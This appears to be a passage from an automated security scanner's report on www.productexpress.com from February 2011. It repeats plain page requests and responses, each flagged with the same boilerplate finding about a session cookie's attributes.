GET /leather.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=B0D4D0EB45F643F4C8305A5E85C2DE07; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /leatherbay-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:36 GMT Server: Apache Set-Cookie: JSESSIONID=64D293982658402C1F62754B04864796; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /levis-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:37 GMT Server: Apache Set-Cookie: JSESSIONID=6A8055478C7BE7B8297C8C824736E10F; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /liquid-tulliani-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:38 GMT Server: Apache Set-Cookie: JSESSIONID=BCC7A2720688ED5EABAAC08D04DA66F3; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lists HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:26 GMT Server: Apache Edge-control: no-store, max-age=0, downstream-ttl=0 Content-Type: text/html Set-Cookie: Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; path=/; expires=Fri, 18-Feb-2011 15:00:28 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> <title>Ch ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lizard-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:59 GMT Server: Apache Set-Cookie: JSESSIONID=48052FD95A747CB5BBA87D78ADC388E6; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /luggage.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:47 GMT Server: Apache Set-Cookie: JSESSIONID=4E5B87F72CA16C6A1A22A35F11ABF637; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mens-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=7684D5118555BB80323F732DCF7DD5C8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mens-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:55 GMT Server: Apache Set-Cookie: JSESSIONID=532C6E1C2AA9953F6E9DA949B1E738DE; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mens.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:23 GMT Server: Apache Set-Cookie: JSESSIONID=A0377104C0A500DA4FD6ACA78528DE4E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mesh-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:20 GMT Server: Apache Set-Cookie: JSESSIONID=590012D61CD32788E120C86C7E5DC91A; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /metal-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:59 GMT Server: Apache Set-Cookie: JSESSIONID=D9F1AE3E110D0CCE78F380A814F64F3C; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /metal-mulisha-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:39 GMT Server: Apache Set-Cookie: JSESSIONID=0EEB5483E1238017121F172F65EC6764; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /multicolored-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:30 GMT Server: Apache Set-Cookie: JSESSIONID=92434EDC2E078477869100E9F42BE8B6; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /navy-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:58 GMT Server: Apache Set-Cookie: JSESSIONID=8D9BD69A4999E724BCE5F6705BB611FD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>N ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /new-styles.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:38 GMT Server: Apache Set-Cookie: JSESSIONID=BDD54D52DCF667FD8737A63425816024; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>N ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /off-white-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:59 GMT Server: Apache Set-Cookie: JSESSIONID=57C9F4878B47F7D6C301C4E3957CAD79; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>O ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /oneill-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:41 GMT Server: Apache Set-Cookie: JSESSIONID=DC2E53448F40E8A966E5CCCF77DE0D6B; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>O ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ostrich-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:01 GMT Server: Apache Set-Cookie: JSESSIONID=B97933EEE3677E281F2865FE323A1EC1; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>O ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
